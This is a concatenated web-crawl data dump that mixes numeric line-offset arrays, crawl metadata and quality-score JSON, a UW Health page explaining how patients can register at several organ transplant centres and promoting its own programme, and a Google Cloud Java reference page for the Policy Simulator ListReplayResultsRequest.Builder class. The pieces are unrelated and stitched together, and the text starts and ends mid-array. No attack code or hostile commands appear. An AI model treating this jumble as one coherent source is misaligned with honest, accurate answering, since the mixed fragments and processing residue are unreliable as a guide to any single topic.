2777,
2787,
2788,
2857,
2858,
3057,
3060,
3066,
3075,
3085,
3086,
3125,
3126,
3329,
3331,
3337,
3346,
3356,
3357,
3419,
3420,
3623,
3625,
3631,
3640,
3649,
3650,
3688,
3689,
3890,
3892,
3898,
3907,
3917,
3918,
4048,
4049,
4252,
4254,
4259,
4267,
4276,
4277,
4367,
4368,
4551,
4553,
4559,
4568,
4577,
4578,
4625,
4626,
4829,
4831,
4837,
4845,
4854,
4855,
4881,
4882,
5087,
5089,
5095,
5104,
5113,
5114,
5185,
5186,
5384,
5386,
5392,
5401,
5411,
5412,
5475,
5476,
5677,
5680,
5686,
5694,
5703,
5704,
5748,
5749,
5951,
5953,
5959,
5967,
5976,
5977,
6040,
6041,
6243,
6247,
6253,
6262,
6272,
6273,
6363,
6364,
6566,
6568,
6574,
6583,
6592,
6593,
6637,
6638,
6840,
6842,
6848,
6857,
6867,
6868,
6944,
6945,
7143,
7145,
7150,
7158,
7168,
7169,
7225,
7226,
7373,
7375,
7381,
7389,
7399,
7400,
7446,
7447,
7648,
7650,
7656,
7665,
7674,
7675,
7715,
7716,
7921,
7923,
7929,
7937,
7947,
7948,
7988,
7989,
8126,
8128,
8134,
8143,
8153,
8154,
8202,
8203,
8345,
8347,
8353,
8362,
8371,
8372,
8438,
8439,
8636,
8638,
8644,
8653,
8662,
8663,
8703,
8704,
8907,
8909,
8915,
8924,
8933,
8934,
8992,
8993,
9194,
9196,
9202,
9211,
9221,
9222,
9279,
9280,
9483,
9486,
9492,
9501,
9510,
9511,
9567,
9568,
9763,
9765,
9771,
9780,
9789,
9790,
9862,
9863,
10057,
10059,
10065,
10074,
10083,
10084,
10126,
10127,
10325,
10327,
10333,
10341,
10350,
10351,
10408,
10409,
10607,
10609,
10615,
10623,
10633,
10634,
10680,
10681,
10864,
10867,
10873,
10882,
10891,
10892,
10937,
10938,
11141,
11143,
11149,
11158,
11167,
11168,
11236,
11237,
11441,
11443,
11448,
11457,
11466,
11467,
11505,
11506,
11710,
11712,
11717,
11725,
11735,
11736,
11814,
11815,
12008,
12012,
12018,
12027,
12037,
12038,
12092,
12093,
12294,
12296,
12301,
12310,
12320,
12321,
12401,
12402,
12602,
12604,
12610,
12619,
12628,
12629,
12664,
12665,
12861,
12863,
12869,
12877,
12887,
12888,
12939,
12940,
13139,
13141,
13147,
13155,
13164,
13165,
13211,
13212,
13408,
13410,
13416,
13424,
13434,
13435,
13496,
13497,
13653,
13656,
13662,
13671,
13680,
13681,
13719,
13720,
13924,
13926,
13931,
13940,
13949,
13950,
13987,
13988,
14189
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 14189,
"ccnet_original_nlines": 403,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.36122778058052063,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.056865908205509186,
"rps_doc_frac_lines_end_with_ellipsis": 0.10148514807224274,
"rps_doc_frac_no_alph_words": 0.1844911128282547,
"rps_doc_frac_unique_words": 0.29518547654151917,
"rps_doc_mean_word_length": 4.313733100891113,
"rps_doc_num_sentences": 196,
"rps_doc_symbol_to_word_ratio": 0.01389337982982397,
"rps_doc_unigram_entropy": 5.707014083862305,
"rps_doc_word_count": 2534,
"rps_doc_frac_chars_dupe_10grams": 0.02250480093061924,
"rps_doc_frac_chars_dupe_5grams": 0.04482664167881012,
"rps_doc_frac_chars_dupe_6grams": 0.04080139100551605,
"rps_doc_frac_chars_dupe_7grams": 0.03750799968838692,
"rps_doc_frac_chars_dupe_8grams": 0.03750799968838692,
"rps_doc_frac_chars_dupe_9grams": 0.03018937073647976,
"rps_doc_frac_chars_top_2gram": 0.011709819547832012,
"rps_doc_frac_chars_top_3gram": 0.007684569805860519,
"rps_doc_frac_chars_top_4gram": 0.006586770061403513,
"rps_doc_books_importance": -1250.339599609375,
"rps_doc_books_importance_length_correction": -1250.339599609375,
"rps_doc_openwebtext_importance": -854.5621337890625,
"rps_doc_openwebtext_importance_length_correction": -854.5621337890625,
"rps_doc_wikipedia_importance": -614.5414428710938,
"rps_doc_wikipedia_importance_length_correction": -614.5414428710938
},
"fasttext": {
"dclm": 0.12893861532211304,
"english": 0.9255377054214478,
"fineweb_edu_approx": 1.4586691856384277,
"eai_general_math": 0.06425880640745163,
"eai_open_web_math": 0.20044535398483276,
"eai_web_code": 0.019231680780649185
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.462",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.67",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,648,400,504,104,720,000
|
Skip to Content
UW Health SMPH
Multiple Listing with the UW Health Transplant Program
News for Referring Physicians
Medical Directions
e-Newsletter Sign-Up
Sign up to receive Medical Directions, the UW Health newsletter for referring physicians, via e-mail. Subscribe
Our Services
UW Health Transplant
Yes, I Will!
Register your intent to be an organ donor with Wisconsin's online donor registry: Yes, I Will
The UW Health Transplant Program is one of the world's foremost organ transplant programs. UW Health physicians are recognized experts in their field, providing care to patients in our heart, lung, kidney, liver, pancreas, intestine, islet cell and pediatric transplant programs.
It is important for patients to understand their options regarding multiple listing for transplant, and the benefits of being listed at the UW Health Transplant Program.
What is multiple listing?
Multiple listing involves registering on the waitlist at two or more transplant centers. The Organ Procurement and Transplantation Network (OPTN) and the United Network of Organ Sharing (UNOS) allow for multiple listings. Transplant programs have the option of refusing to list a patient for transplant who is already listed with another center. However, UW Health encourages patients to multiple list in different organ donation service areas to increase their chances of receiving an organ offer.
Why should a patient consider multiple listing?
Multiple listing may decrease a patient's waiting time for a transplant. Many factors affect how long a patient might wait for a transplant, including: organ availability, medical urgency and having a "highly sensitized" immune system. (Highly sensitized patients are patients who have a higher likelihood of rejecting a transplanted organ and will match well with only a limited number of donated organs.)
What are the benefits of multiple listing?
Share This StoryWaiting time is the main determining factor for patients waiting for abdominal organs such as kidney and pancreas. Some studies suggest multiple listing can shorten the waiting time of kidney transplant patients by several months. For kidney patients, getting transplanted before the patient requires dialysis greatly improves the transplant outcome. While the heart, liver and lung organs are allocated based upon medical urgency and expected outcomes, the length of time a recipient is on the waiting list is also a determining factor in situations where two patients have identical rankings.
How does a patient list at multiple centers?
A patient should contact the transplant center(s) at which he/ she would like to be listed. Each center will determine if they will accept the patient to their waiting list. Some centers may not accept multiple-listed patients, and some may have special requirements for multiple-listed candidates. You should ask the transplant team how they handle multiple-listing requests.
The patient will have to complete an evaluation at each transplant center and agree to meet any conditions set by that center. It is a good idea for the patient to check with the insurance provider to see if they will reimburse the cost of additional evaluations. The patient should also consider other costs, such as travel and lodging. Patients may be listed at as many centers as they wish and the transplant centers do not have to be within the same geographic region where the patient lives. If a patient lists at multiple centers, the waiting time will start from the date each center adds the patient to their waitlist.
The longest amount of time the patient waited at any center is called primary waiting time. It may be possible to transfer primary waiting time to another center, but patients are not allowed to add or split total waiting time among multiple centers. Any request to switch waiting time must be approved by the transplant center(s) involved. Patients probably would not benefit from listing at multiple transplant centers within the same organ donor service or local allocation area. This is because waiting-time priority is first calculated among candidates at all hospitals within the local allocation area, not for each individual hospital. Patients who wish to be listed at more than one center typically list within two separate allocation areas.
What is a waiting-time transfer?
A waiting time transfer involves ending a patient's listing at one transplant center and transferring it to another center. Primary waiting time can be transferred if the patient coordinates this decision with both transplant centers.
What are the benefits of listing with the UW Health Transplant program?
Patients listed with the UW Health Transplant Program tend to experience shorter than average wait times due to the exceptional efforts and high performance of UW Organ and Tissue Donation, which serves the UW Health Transplant Program.
Learn about UW Health Transplant wait times
The UW Health Transplant Program has wait times that are among the shortest in the nation. These wait times, in addition to our rich history of patient success, make the UW Health Transplant Program an excellent option for any patient, including those who are pursuing their option to be listed at multiple centers.
Leave Us a Comment
Let us know what you think about this article or tell us what you'd like to see in future issues of Medical Directions.
|
{
"url": "http://www.uwhealth.org/referring-physician-news/multiple-transplant-waitlist-listings/30877",
"source_domain": "www.uwhealth.org",
"snapshot_id": "crawl=CC-MAIN-2013-20",
"warc_metadata": {
"Content-Length": "41030",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:B3FGZCGMQSSTWKBOFFOWM4GDIZ4GAKQ6",
"WARC-Concurrent-To": "<urn:uuid:254df041-8815-4c4a-9091-3b797a16e188>",
"WARC-Date": "2013-05-23T13:51:50Z",
"WARC-IP-Address": "144.92.216.45",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:KAHL5MUNVYVKKKITHLS3XWMDHHEF3WOW",
"WARC-Record-ID": "<urn:uuid:2db74386-f7ca-4c86-8ca8-67a2933af9e9>",
"WARC-Target-URI": "http://www.uwhealth.org/referring-physician-news/multiple-transplant-waitlist-listings/30877",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:4f658e5e-a742-486d-a49a-a03080c77521>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-60-113-184.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2013-20\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for Spring 2013\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
16,
31,
32,
87,
88,
118,
119,
138,
139,
160,
161,
273,
274,
276,
277,
290,
291,
312,
313,
315,
316,
329,
330,
424,
425,
705,
706,
708,
709,
879,
880,
882,
883,
909,
910,
912,
913,
1412,
1413,
1415,
1416,
1464,
1465,
1467,
1468,
1875,
1876,
1878,
1879,
1922,
1923,
1925,
1926,
2537,
2538,
2540,
2541,
2586,
2587,
2589,
2590,
2967,
2968,
2970,
2971,
3598,
3599,
3601,
3602,
4353,
4354,
4356,
4357,
4390,
4391,
4393,
4394,
4629,
4630,
4632,
4633,
4705,
4706,
4708,
4709,
4946,
4947,
4949,
4950,
4994,
4995,
4997,
4998,
5314,
5315,
5317,
5318,
5337,
5338,
5340,
5341,
5461,
5462
],
"line_end_idx": [
16,
31,
32,
87,
88,
118,
119,
138,
139,
160,
161,
273,
274,
276,
277,
290,
291,
312,
313,
315,
316,
329,
330,
424,
425,
705,
706,
708,
709,
879,
880,
882,
883,
909,
910,
912,
913,
1412,
1413,
1415,
1416,
1464,
1465,
1467,
1468,
1875,
1876,
1878,
1879,
1922,
1923,
1925,
1926,
2537,
2538,
2540,
2541,
2586,
2587,
2589,
2590,
2967,
2968,
2970,
2971,
3598,
3599,
3601,
3602,
4353,
4354,
4356,
4357,
4390,
4391,
4393,
4394,
4629,
4630,
4632,
4633,
4705,
4706,
4708,
4709,
4946,
4947,
4949,
4950,
4994,
4995,
4997,
4998,
5314,
5315,
5317,
5318,
5337,
5338,
5340,
5341,
5461,
5462,
5463
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5463,
"ccnet_original_nlines": 103,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3774765431880951,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.022940559312701225,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.10114703327417374,
"rps_doc_frac_unique_words": 0.37662339210510254,
"rps_doc_mean_word_length": 5.223140716552734,
"rps_doc_num_sentences": 43,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.108338356018066,
"rps_doc_word_count": 847,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.06555154174566269,
"rps_doc_frac_chars_dupe_6grams": 0.024864379316568375,
"rps_doc_frac_chars_dupe_7grams": 0.017631100490689278,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02531646005809307,
"rps_doc_frac_chars_top_3gram": 0.040687158703804016,
"rps_doc_frac_chars_top_4gram": 0.037974681705236435,
"rps_doc_books_importance": -494.2564697265625,
"rps_doc_books_importance_length_correction": -494.2564697265625,
"rps_doc_openwebtext_importance": -255.23031616210938,
"rps_doc_openwebtext_importance_length_correction": -255.23031616210938,
"rps_doc_wikipedia_importance": -159.7477569580078,
"rps_doc_wikipedia_importance_length_correction": -159.7477569580078
},
"fasttext": {
"dclm": 0.03172380104660988,
"english": 0.9335350394248962,
"fineweb_edu_approx": 1.5064880847930908,
"eai_general_math": 0.001238579978235066,
"eai_open_web_math": 0.0860365629196167,
"eai_web_code": 0.0001411400007782504
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.994",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "616.075",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "13",
"label": "News (Org.)"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-886,609,542,383,354,200
|
Class ListReplayResultsRequest.Builder (0.7.0)
public static final class ListReplayResultsRequest.Builder extends GeneratedMessageV3.Builder<ListReplayResultsRequest.Builder> implements ListReplayResultsRequestOrBuilder
Request message for Simulator.ListReplayResults.
Protobuf type google.cloud.policysimulator.v1.ListReplayResultsRequest
Static Methods
getDescriptor()
public static final Descriptors.Descriptor getDescriptor()
Returns
TypeDescription
Descriptor
Methods
addRepeatedField(Descriptors.FieldDescriptor field, Object value)
public ListReplayResultsRequest.Builder addRepeatedField(Descriptors.FieldDescriptor field, Object value)
Parameters
NameDescription
fieldFieldDescriptor
valueObject
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
build()
public ListReplayResultsRequest build()
Returns
TypeDescription
ListReplayResultsRequest
buildPartial()
public ListReplayResultsRequest buildPartial()
Returns
TypeDescription
ListReplayResultsRequest
clear()
public ListReplayResultsRequest.Builder clear()
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
clearField(Descriptors.FieldDescriptor field)
public ListReplayResultsRequest.Builder clearField(Descriptors.FieldDescriptor field)
Parameter
NameDescription
fieldFieldDescriptor
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
clearOneof(Descriptors.OneofDescriptor oneof)
public ListReplayResultsRequest.Builder clearOneof(Descriptors.OneofDescriptor oneof)
Parameter
NameDescription
oneofOneofDescriptor
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
clearPageSize()
public ListReplayResultsRequest.Builder clearPageSize()
The maximum number of ReplayResult objects to return. Defaults to 5000.
The maximum value is 5000; values above 5000 are rounded down to 5000.
int32 page_size = 2;
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
clearPageToken()
public ListReplayResultsRequest.Builder clearPageToken()
A page token, received from a previous Simulator.ListReplayResults call. Provide this token to retrieve the next page of results.
When paginating, all other parameters provided to [Simulator.ListReplayResults[] must match the call that provided the page token.
string page_token = 3;
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
clearParent()
public ListReplayResultsRequest.Builder clearParent()
Required. The Replay whose results are listed, in the following format:
{projects|folders|organizations}/{resource-id}/locations/global/replays/{replay-id}
Example: projects/my-project/locations/global/replays/506a5f7f-38ce-4d7d-8e03-479ce1833c36
string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... }
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
clone()
public ListReplayResultsRequest.Builder clone()
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
getDefaultInstanceForType()
public ListReplayResultsRequest getDefaultInstanceForType()
Returns
TypeDescription
ListReplayResultsRequest
getDescriptorForType()
public Descriptors.Descriptor getDescriptorForType()
Returns
TypeDescription
Descriptor
Overrides
getPageSize()
public int getPageSize()
The maximum number of ReplayResult objects to return. Defaults to 5000.
The maximum value is 5000; values above 5000 are rounded down to 5000.
int32 page_size = 2;
Returns
TypeDescription
int
The pageSize.
getPageToken()
public String getPageToken()
A page token, received from a previous Simulator.ListReplayResults call. Provide this token to retrieve the next page of results.
When paginating, all other parameters provided to [Simulator.ListReplayResults[] must match the call that provided the page token.
string page_token = 3;
Returns
TypeDescription
String
The pageToken.
getPageTokenBytes()
public ByteString getPageTokenBytes()
A page token, received from a previous Simulator.ListReplayResults call. Provide this token to retrieve the next page of results.
When paginating, all other parameters provided to [Simulator.ListReplayResults[] must match the call that provided the page token.
string page_token = 3;
Returns
TypeDescription
ByteString
The bytes for pageToken.
getParent()
public String getParent()
Required. The Replay whose results are listed, in the following format:
{projects|folders|organizations}/{resource-id}/locations/global/replays/{replay-id}
Example: projects/my-project/locations/global/replays/506a5f7f-38ce-4d7d-8e03-479ce1833c36
string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... }
Returns
TypeDescription
String
The parent.
getParentBytes()
public ByteString getParentBytes()
Required. The Replay whose results are listed, in the following format:
{projects|folders|organizations}/{resource-id}/locations/global/replays/{replay-id}
Example: projects/my-project/locations/global/replays/506a5f7f-38ce-4d7d-8e03-479ce1833c36
string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... }
Returns
TypeDescription
ByteString
The bytes for parent.
internalGetFieldAccessorTable()
protected GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable()
Returns
TypeDescription
FieldAccessorTable
Overrides
isInitialized()
public final boolean isInitialized()
Returns
TypeDescription
boolean
Overrides
mergeFrom(ListReplayResultsRequest other)
public ListReplayResultsRequest.Builder mergeFrom(ListReplayResultsRequest other)
Parameter
NameDescription
otherListReplayResultsRequest
Returns
TypeDescription
ListReplayResultsRequest.Builder
mergeFrom(CodedInputStream input, ExtensionRegistryLite extensionRegistry)
public ListReplayResultsRequest.Builder mergeFrom(CodedInputStream input, ExtensionRegistryLite extensionRegistry)
Parameters
NameDescription
inputCodedInputStream
extensionRegistryExtensionRegistryLite
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
Exceptions
TypeDescription
IOException
mergeFrom(Message other)
public ListReplayResultsRequest.Builder mergeFrom(Message other)
Parameter
NameDescription
otherMessage
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
mergeUnknownFields(UnknownFieldSet unknownFields)
public final ListReplayResultsRequest.Builder mergeUnknownFields(UnknownFieldSet unknownFields)
Parameter
NameDescription
unknownFieldsUnknownFieldSet
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
setField(Descriptors.FieldDescriptor field, Object value)
public ListReplayResultsRequest.Builder setField(Descriptors.FieldDescriptor field, Object value)
Parameters
NameDescription
fieldFieldDescriptor
valueObject
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
setPageSize(int value)
public ListReplayResultsRequest.Builder setPageSize(int value)
The maximum number of ReplayResult objects to return. Defaults to 5000.
The maximum value is 5000; values above 5000 are rounded down to 5000.
int32 page_size = 2;
Parameter
NameDescription
valueint
The pageSize to set.
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
setPageToken(String value)
public ListReplayResultsRequest.Builder setPageToken(String value)
A page token, received from a previous Simulator.ListReplayResults call. Provide this token to retrieve the next page of results.
When paginating, all other parameters provided to [Simulator.ListReplayResults[] must match the call that provided the page token.
string page_token = 3;
Parameter
NameDescription
valueString
The pageToken to set.
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
setPageTokenBytes(ByteString value)
public ListReplayResultsRequest.Builder setPageTokenBytes(ByteString value)
A page token, received from a previous Simulator.ListReplayResults call. Provide this token to retrieve the next page of results.
When paginating, all other parameters provided to [Simulator.ListReplayResults[] must match the call that provided the page token.
string page_token = 3;
Parameter
NameDescription
valueByteString
The bytes for pageToken to set.
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
setParent(String value)
public ListReplayResultsRequest.Builder setParent(String value)
Required. The Replay whose results are listed, in the following format:
{projects|folders|organizations}/{resource-id}/locations/global/replays/{replay-id}
Example: projects/my-project/locations/global/replays/506a5f7f-38ce-4d7d-8e03-479ce1833c36
string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... }
Parameter
NameDescription
valueString
The parent to set.
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
setParentBytes(ByteString value)
public ListReplayResultsRequest.Builder setParentBytes(ByteString value)
Required. The Replay whose results are listed, in the following format:
{projects|folders|organizations}/{resource-id}/locations/global/replays/{replay-id}
Example: projects/my-project/locations/global/replays/506a5f7f-38ce-4d7d-8e03-479ce1833c36
string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... }
Parameter
NameDescription
valueByteString
The bytes for parent to set.
Returns
TypeDescription
ListReplayResultsRequest.Builder
This builder for chaining.
setRepeatedField(Descriptors.FieldDescriptor field, int index, Object value)
public ListReplayResultsRequest.Builder setRepeatedField(Descriptors.FieldDescriptor field, int index, Object value)
Parameters
NameDescription
fieldFieldDescriptor
indexint
valueObject
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
setUnknownFields(UnknownFieldSet unknownFields)
public final ListReplayResultsRequest.Builder setUnknownFields(UnknownFieldSet unknownFields)
Parameter
NameDescription
unknownFieldsUnknownFieldSet
Returns
TypeDescription
ListReplayResultsRequest.Builder
Overrides
|
{
"url": "https://cloud.google.com/java/docs/reference/google-cloud-policysimulator/0.7.0/com.google.cloud.policysimulator.v1.ListReplayResultsRequest.Builder",
"source_domain": "cloud.google.com",
"snapshot_id": "CC-MAIN-2024-33",
"warc_metadata": {
"Content-Length": "395758",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SXXMNRYKOUUMZRSMT4PZMMJRJ7QIFTLL",
"WARC-Concurrent-To": "<urn:uuid:5e4d35d3-861a-4260-bf42-00d4e9d78674>",
"WARC-Date": "2024-08-10T23:40:34Z",
"WARC-IP-Address": "172.253.62.139",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:BUA25WBIEO2NBUS5P2GIFEKXNU23RWS4",
"WARC-Record-ID": "<urn:uuid:2619f12c-e172-4153-a0d5-85b3e9ed5b59>",
"WARC-Target-URI": "https://cloud.google.com/java/docs/reference/google-cloud-policysimulator/0.7.0/com.google.cloud.policysimulator.v1.ListReplayResultsRequest.Builder",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:2d506271-2e19-43dc-bd66-44dffef1518b>"
},
"warc_info": "isPartOf: CC-MAIN-2024-33\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for August 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-199\r\nsoftware: Apache Nutch 1.20 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
47,
48,
221,
222,
271,
272,
343,
344,
359,
360,
376,
377,
436,
444,
460,
471,
472,
480,
481,
547,
548,
654,
665,
681,
702,
714,
722,
738,
771,
781,
782,
790,
791,
831,
839,
855,
880,
881,
896,
897,
944,
952,
968,
993,
994,
1002,
1003,
1051,
1059,
1075,
1108,
1118,
1119,
1165,
1166,
1252,
1262,
1278,
1299,
1307,
1323,
1356,
1366,
1367,
1413,
1414,
1500,
1510,
1526,
1547,
1555,
1571,
1604,
1614,
1615,
1631,
1632,
1688,
1689,
1761,
1762,
1833,
1834,
1855,
1856,
1864,
1880,
1913,
1914,
1941,
1942,
1959,
1960,
2017,
2018,
2148,
2149,
2280,
2281,
2304,
2305,
2313,
2329,
2362,
2363,
2390,
2391,
2405,
2406,
2460,
2461,
2533,
2534,
2618,
2619,
2710,
2711,
2814,
2815,
2823,
2839,
2872,
2873,
2900,
2901,
2909,
2910,
2958,
2966,
2982,
3015,
3025,
3026,
3054,
3055,
3115,
3123,
3139,
3164,
3165,
3188,
3189,
3242,
3250,
3266,
3277,
3287,
3288,
3302,
3303,
3328,
3329,
3401,
3402,
3473,
3474,
3495,
3496,
3504,
3520,
3524,
3525,
3539,
3540,
3555,
3556,
3585,
3586,
3716,
3717,
3848,
3849,
3872,
3873,
3881,
3897,
3904,
3905,
3920,
3921,
3941,
3942,
3980,
3981,
4111,
4112,
4243,
4244,
4267,
4268,
4276,
4292,
4303,
4304,
4329,
4330,
4342,
4343,
4369,
4370,
4442,
4443,
4527,
4528,
4619,
4620,
4723,
4724,
4732,
4748,
4755,
4756,
4768,
4769,
4786,
4787,
4822,
4823,
4895,
4896,
4980,
4981,
5072,
5073,
5176,
5177,
5185,
5201,
5212,
5213,
5235,
5236,
5268,
5269,
5349,
5357,
5373,
5392,
5402,
5403,
5419,
5420,
5457,
5465,
5481,
5489,
5499,
5500,
5542,
5543,
5625,
5635,
5651,
5681,
5689,
5705,
5738,
5739,
5814,
5815,
5930,
5941,
5957,
5979,
6018,
6026,
6042,
6075,
6085,
6096,
6112,
6124,
6125,
6150,
6151,
6216,
6226,
6242,
6255,
6263,
6279,
6312,
6322,
6323,
6373,
6374,
6470,
6480,
6496,
6525,
6533,
6549,
6582,
6592,
6593,
6651,
6652,
6750,
6761,
6777,
6798,
6810,
6818,
6834,
6867,
6877,
6878,
6901,
6902,
6965,
6966,
7038,
7039,
7110,
7111,
7132,
7133,
7143,
7159,
7168,
7169,
7190,
7191,
7199,
7215,
7248,
7249,
7276,
7277,
7304,
7305,
7372,
7373,
7503,
7504,
7635,
7636,
7659,
7660,
7670,
7686,
7698,
7699,
7721,
7722,
7730,
7746,
7779,
7780,
7807,
7808,
7844,
7845,
7921,
7922,
8052,
8053,
8184,
8185,
8208,
8209,
8219,
8235,
8251,
8252,
8284,
8285,
8293,
8309,
8342,
8343,
8370,
8371,
8395,
8396,
8460,
8461,
8533,
8534,
8618,
8619,
8710,
8711,
8814,
8815,
8825,
8841,
8853,
8854,
8873,
8874,
8882,
8898,
8931,
8932,
8959,
8960,
8993,
8994,
9067,
9068,
9140,
9141,
9225,
9226,
9317,
9318,
9421,
9422,
9432,
9448,
9464,
9465,
9494,
9495,
9503,
9519,
9552,
9553,
9580,
9581,
9658,
9659,
9776,
9787,
9803,
9824,
9833,
9845,
9853,
9869,
9902,
9912,
9913,
9961,
9962,
10056,
10066,
10082,
10111,
10119,
10135,
10168
],
"line_end_idx": [
47,
48,
221,
222,
271,
272,
343,
344,
359,
360,
376,
377,
436,
444,
460,
471,
472,
480,
481,
547,
548,
654,
665,
681,
702,
714,
722,
738,
771,
781,
782,
790,
791,
831,
839,
855,
880,
881,
896,
897,
944,
952,
968,
993,
994,
1002,
1003,
1051,
1059,
1075,
1108,
1118,
1119,
1165,
1166,
1252,
1262,
1278,
1299,
1307,
1323,
1356,
1366,
1367,
1413,
1414,
1500,
1510,
1526,
1547,
1555,
1571,
1604,
1614,
